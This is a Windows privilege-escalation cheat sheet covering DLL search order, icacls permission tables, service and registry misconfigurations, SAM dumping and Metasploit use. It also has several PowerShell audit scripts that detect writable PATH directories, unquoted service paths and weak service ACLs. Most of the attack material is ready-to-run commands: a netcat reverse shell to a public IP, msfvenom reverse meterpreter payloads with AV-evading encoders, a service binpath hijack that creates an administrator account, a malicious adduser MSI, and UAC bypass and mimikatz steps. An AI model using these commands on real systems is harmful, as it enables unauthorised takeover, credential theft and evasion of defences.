
DLL Search Order

1. The directory from which the application loaded
2. The Windows 32-bit System directory (C:\Windows\System32)
3. The Windows 16-bit System directory (C:\Windows\System)
4. The Windows directory (C:\Windows)
5. The current working directory (CWD)
6. The directories in the System PATH variable
7. The directories in the User PATH variable

The following image highlights the Java JDK's binary directory, which is contained in the System PATH variable:

If a service binary is located in such a directory, any authenticated user can overwrite the binary or the service's DLLs and escalate their privileges. The following output shows the default permissions Windows assigns to a newly created directory called DangerousService under the C:\ drive on a Windows Server 2008 R2 system.

On some Windows versions the output looks like the one below.

cacls Inherited Permissions

OI - Object inherit  - This folder and files (no inheritance to subfolders)
CI - Container inherit - This folder and subfolders
IO - Inherit only    - The ACE does not apply to the current file/directory
ID - Inherited       - The ACE was inherited from the parent directory's ACL
#These can be combined as follows:
(OI)(CI)      This folder, subfolders, and files
(OI)(CI)(IO)  Subfolders and files only
(CI)(IO)      Subfolders only
(OI)(IO)      Files only

icacls Inherited Permissions

perm is a permission mask and can be specified in one of two forms:
  a sequence of simple rights:
    D  - Delete access
    F  - Full access
    N  - No access
    M  - Modify access
    RX - Read and eXecute access
    R  - Read-only access
    W  - Write-only access
  a comma-separated list in parentheses of specific rights:
    DE   - Delete
    RC   - read control
    WDAC - write DAC
    WO   - write owner
    S    - synchronize
    AS   - access system security
    MA   - maximum allowed
    GR   - generic read
    GW   - generic write
    GE   - generic execute
    GA   - generic all
    RD   - read data/list directory
    WD   - write data/add file
    AD   - append data/add subdirectory
    REA  - read extended attributes
    WEA  - write extended attributes
    X    - execute/traverse
    DC   - delete child
    RA   - read attributes
    WA   - write attributes
  inheritance rights can precede either form and are applied only to directories:
    (OI) - object inherit
    (CI) - container inherit
    (IO) - inherit only
    (NP) - don't propagate inherit
    (I)  - permission inherited from parent container
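A PowerShell check, added here as an example rather than taken from the original notes, that ties the search-order and ACL points above together: it walks the machine-wide PATH and reports every directory where Everyone, Users, Authenticated Users or INTERACTIVE hold a write-class right, together with the inheritance flags that icacls prints as (OI)(CI)(IO). It assumes Windows PowerShell 5.1 or later and no extra modules.

```powershell
function Get-WritablePathDirectories {
    # Principals every local user belongs to; a grant to one of these is a
    # grant to anyone who can log on.
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
               'NT AUTHORITY\INTERACTIVE')
    # Any of these bits lets the holder add or replace files in the directory,
    # which is what turns a PATH entry into a DLL/binary planting location.
    $writeMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, AppendData, WriteData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership, Write, Modify, FullControl'

    $machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    $dirs = $machinePath -split ';' | Where-Object { $_ -and (Test-Path -LiteralPath $_) }
    foreach ($dir in $dirs) {
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broad -notcontains $ace.IdentityReference.Value) { continue }
            # generic rights show up as negative ints, so compare the raw masks
            if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Directory   = $dir
                Principal   = $ace.IdentityReference.Value
                Rights      = $ace.FileSystemRights
                # InheritanceFlags/PropagationFlags are what icacls renders as (OI)(CI)(IO)
                Inheritance = "$($ace.InheritanceFlags) / $($ace.PropagationFlags)"
                Inherited   = $ace.IsInherited
            }
        }
    }
}

# Anything listed here should lose the write grant for the broad principal
# (or the service/tool should move out of that directory).
Get-WritablePathDirectories | Format-Table -AutoSize
```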

Accesschk
WindowsPrivEsc.ppt
Tools
PsInfo.exe
Psexec to execute as different user
Weak Service Exploitation
#list all services
wmic service list brief
#list all services binary path
wmic service list config
#compile list of service binary paths outside system32 and check their permissions
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> permissions.txt
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
#wmic to start service
C:\Users\homer> wmic service ose call startservice

#Migrate to another pid
wmic process list brief | find "winlogon"
#LFI Blind
C:\WINDOWS\system32\eula.txt

Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
Windows Privilege Checker
windows-privesc-check2.exe audit -a -o result
Check Schtasks
schtasks /query /fo LIST /v
#check whether any task runs as SYSTEM

WINDOWS ESCALATE SERVICE PERMISSIONS LOCAL PRIVILEGE ESCALATION
use exploit/windows/local/service_permissions
KITRAP0D
https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d

Cacls or Icacls

Perm is a permission mask that can be specified in one of the following forms:
  A sequence of simple rights:
    F  (full access)
    M  (modify access)
    RX (read and execute access)
    R  (read-only access)
    W  (write-only access)
  A comma-separated list in parentheses of specific rights:
    D    (delete)
    RC   (read control)
    WDAC (write DAC)
    WO   (write owner)
    S    (synchronize)
    AS   (access system security)
    MA   (maximum allowed)
    GR   (generic read)
    GW   (generic write)
    GE   (generic execute)
    GA   (generic all)
    RD   (read data/list directory)
    WD   (write data/add file)
    AD   (append data/add subdirectory)
    REA  (read extended attributes)
    WEA  (write extended attributes)
    X    (execute/traverse)
    DC   (delete child)
    RA   (read attributes)
    WA   (write attributes)
  Inheritance rights may precede either Perm form, and they are applied only to directories:
    (OI): object inherit
    (CI): container inherit
    (IO): inherit only
    (NP): do not propagate inherit

FILE_APPEND_DATA
Getsystem
#if it fails, run post/windows/manage/migrate and try again
Download file using powershell
echo (New-Object System.Net.WebClient).DownloadFile("https://i.ytimg.com/vi/ndsaoMFz9J4/maxresdefault.jpg", ".\cat.jpg") >> meow.ps1
&powershell -ExecutionPolicy ByPass -File meow.ps1
netcat nc remote shell
&nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
netcat nc host remote shell
nc -lv -p 13337
VirtualBox to public IP
set the VM network adapter to bridged mode
set up port forwarding on the modem
upgrading shell to meterpreter-shell
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
sessions -u [id]
upgrading 32-bit shell to 64-bit meterpreter shell
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
nmap examples
#-Pn skips host discovery (the older spelling was -P0 with a zero)
nmap -sT -A -Pn [IP addr]

how to compile a payload
./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=54.251.141.181 LPORT=13337 R -f psh -o meow.exe
priv escalate using bypassuac
use exploit/windows/local/bypassuac
Service Binaries [11]
Windows Service Trusted Path
#find auto-start services outside C:\Windows whose binary path is unquoted (how that file name is handled is what gets exploited)
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
#check if user is allowed to write/run service
icacls "C:\Program Files\sample"
#create payload
./msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai lhost=54.251.141.181 lport=8885 -f exe -o Mail.exe
#restart service
sc stop [service]
sc start [service]
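The wmic/findstr one-liner above only lists candidates; this PowerShell version, an added example and not part of the original notes, does the same from Win32_Service and also reports the directories the loader probes before reaching the real binary (the ACLs to check with icacls) and the quoted ImagePath that fixes the service. It assumes Windows PowerShell 5.1 or later.

```powershell
function Get-UnquotedServicePaths {
    # An unquoted ImagePath containing spaces is resolved by trying each
    # space-delimited prefix as "<prefix>.exe" before the real executable.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }
        # executable = everything up to and including the first ".exe"; the rest is arguments
        $exe = if ($path -match '^(.+?\.exe)') { $Matches[1] } else { $path }
        if ($exe -notmatch ' ') { continue }
        $parts = $exe -split ' '
        # directory of every "<prefix>.exe" the loader would try first
        $probeDirs = for ($i = 1; $i -lt $parts.Count; $i++) {
            Split-Path -Parent (($parts[0..($i - 1)] -join ' ') + '.exe')
        }
        [pscustomobject]@{
            Service   = $svc.Name
            StartMode = $svc.StartMode
            RunsAs    = $svc.StartName
            ImagePath = $path
            # these ACLs decide whether the misconfiguration is exploitable
            ProbeDirs = ($probeDirs | Sort-Object -Unique) -join '; '
            # the fix: quote the executable, e.g. sc.exe config <name> binPath= "\"<exe>\" <args>"
            FixedPath = '"' + $exe + '"' + $path.Substring($exe.Length)
        }
    }
}

Get-UnquotedServicePaths | Format-List
```

Services that run as LocalSystem with Auto start and a ProbeDir writable by Users are the ones to fix first.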
Windows Binaries [11]
#download Accesschk, which allows advanced querying, managing and troubleshooting of systems and applications
#check which services can be modified by any authenticated user
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
#check configuration of the service
sc qc PFNET
#add new user to local administrator group
sc config PFNET binpath= "net user rottenadmin P@ssword123! /add"
sc stop PFNET
sc start PFNET
sc config PFNET binpath= "net localgroup Administrators rottenadmin /add"
sc stop PFNET
sc start PFNET
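The accesschk query above depends on a Sysinternals download; as an added example (not from the original notes) the same weak-service check can be done with built-in tools by decoding each service's security descriptor from `sc.exe sdshow` and flagging ACEs that grant change-config, write-DAC, write-owner or generic-all rights to Everyone, Authenticated Users, Users or INTERACTIVE. Assumes Windows PowerShell 5.1 or later; numeric (0x...) rights masks are skipped rather than decoded.

```powershell
# SDDL two-letter access codes as they apply to service objects.
$ServiceRightName = @{
    CC='QueryConfig'; DC='ChangeConfig'; LC='QueryStatus'; SW='EnumerateDependents'
    RP='Start'; WP='Stop'; DT='PauseContinue'; LO='Interrogate'; CR='UserDefinedControl'
    SD='Delete'; RC='ReadControl'; WD='WriteDac'; WO='WriteOwner'; GA='GenericAll'; GW='GenericWrite'
}
# Rights that let the holder repoint or take over the service (what accesschk -uwcqv reports).
$DangerousRights = 'DC', 'WD', 'WO', 'GA', 'GW'
# SDDL SID aliases (and raw SIDs) that every local user is a member of.
$BroadSids = @{
    WD='Everyone'; AU='Authenticated Users'; BU='Users'; IU='INTERACTIVE'
    'S-1-1-0'='Everyone'; 'S-1-5-11'='Authenticated Users'; 'S-1-5-32-545'='Users'; 'S-1-5-4'='INTERACTIVE'
}

function Get-WeakServiceAcl {
    foreach ($svc in Get-Service) {
        # sc.exe prints the descriptor as "D:(...)(...)S:(...)" on one line
        $sddl = (& sc.exe sdshow $svc.Name | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }
        # allow ACE layout: (A;flags;rights;object_guid;inherit_guid;sid); audit ACEs (AU;...) do not match
        foreach ($m in [regex]::Matches($sddl, '\(A;([^;]*);([^;]*);[^;]*;[^;]*;([^)]+)\)')) {
            $rights = $m.Groups[2].Value
            $sid    = $m.Groups[3].Value
            if (-not $BroadSids.ContainsKey($sid)) { continue }
            if ($rights -like '0x*') { continue }   # hex mask form, not decoded here
            # the rights field is a run of two-character codes
            $codes = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
            $bad = $codes | Where-Object { $DangerousRights -contains $_ }
            if ($bad) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    Principal = $BroadSids[$sid]
                    Rights    = ($bad | ForEach-Object { $ServiceRightName[$_] }) -join ','
                }
            }
        }
    }
}

# Any hit is a service whose binPath a standard user can rewrite, exactly the
# PFNET case above; remove the grant with sc.exe sdset or via Group Policy.
Get-WeakServiceAcl | Format-Table -AutoSize
```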
AlwaysInstallElevated [11]
AlwaysInstallElevated is a setting that allows non-privileged users to run Microsoft Windows Installer package files (MSI) with elevated (SYSTEM) permissions.
#run registry query to check policy
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#generate a new payload that will add a new user
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi
#run the installer quietly in the background
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
Unattended Install
Unattended installation is an automated installation technology in Microsoft Windows Server 2003 that you can use to install or upgrade an operating system with minimal user intervention.
#check these directories for a leftover unattended-install XML (Unattend.xml), which can contain credentials
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\
Dumping SAM FIle
#dump the Security Account Manager (SAM) database, where passwords are stored as LM hashes that the system authenticates against
gsecdump
fgdump
hobocopy
Weak permissions on Processes
Inject processes http://www.tarasco.org/security/Process_Injector/
Sensitive information stored in shared folders
using tool like (auxiliary/scanner/smb/smb_enumshares)
Mimikatz
This retrieves passwords from memory since
migrate pid
load mimikatz
wdigest
What payload do you want to generate:

   Name:                                   Description:
   -----                                   ------------
   1. Windows Shell Reverse_TCP            Windows Command Shell, Reverse TCP Stager
   2. Windows Reverse_TCP Meterpreter      Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   3. Windows Reverse_TCP VNC DLL          VNC Server (Reflective Injection), Reverse TCP Stager
   4. Windows Bind Shell                   Windows Command Shell, Bind TCP Stager
   5. Windows Bind Shell X64               Windows x64 Command Shell, Bind TCP Inline
   6. Windows Shell Reverse_TCP X64        Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   7. Windows Meterpreter Reverse_TCP X64  Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
   8. Windows Meterpreter Reverse HTTPS    Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   9. Windows Meterpreter Reverse DNS      Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)

Enter number: 2

What encoder would you like to try and bypass AV with.

   Name:                    Description:
   -----                    ------------
   1. avoid_utf8_tolower    Avoid UTF8/tolower
   2. shikata_ga_nai        Polymorphic XOR Additive Feedback Encoder
   3. alpha_mixed           Alpha2 Alphanumeric Mixedcase Encoder
   4. alpha_upper           Alpha2 Alphanumeric Uppercase Encoder
   5. call4_dword_xor       Call+4 Dword XOR Encoder
   6. countdown             Single-byte XOR Countdown Encoder
   7. fnstenv_mov           Variable-length Fnstenv/mov Dword XOR Encoder
   8. jmp_call_additive     Jump/Call XOR Additive Feedback Encoder
   9. nonalpha              Non-Alpha Encoder
   10. nonupper             Non-Upper Encoder
   11. unicode_mixed        Alpha2 Alphanumeric Unicode Mixedcase Encoder
   12. unicode_upper        Alpha2 Alphanumeric Unicode Uppercase Encoder

171.248.151.85:13337

Reference

1. http://www.fuzzysecurity.com/tutorials/16.html
2. http://infosecluke.blogspot.com/2013/05/from-netcat-nc-to-meterpreter-shell.html
3. https://www.youtube.com/watch?v=j0L91QmAvVE
4. https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-MetasploitDevelopment-Environment
5. https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-inwindows-7-using-metasploit/
6. https://laharisi.wordpress.com/2011/04/07/privilege-escalation-windows-uac-bypass/
7. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
8. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
9. http://netsec.ws/?p=331
10. http://hatriot.github.io/blog/2014/03/10/meterpreter-shell-upgrades-using-powershell/
11. http://toshellandback.com/2015/11/24/ms-priv-esc/
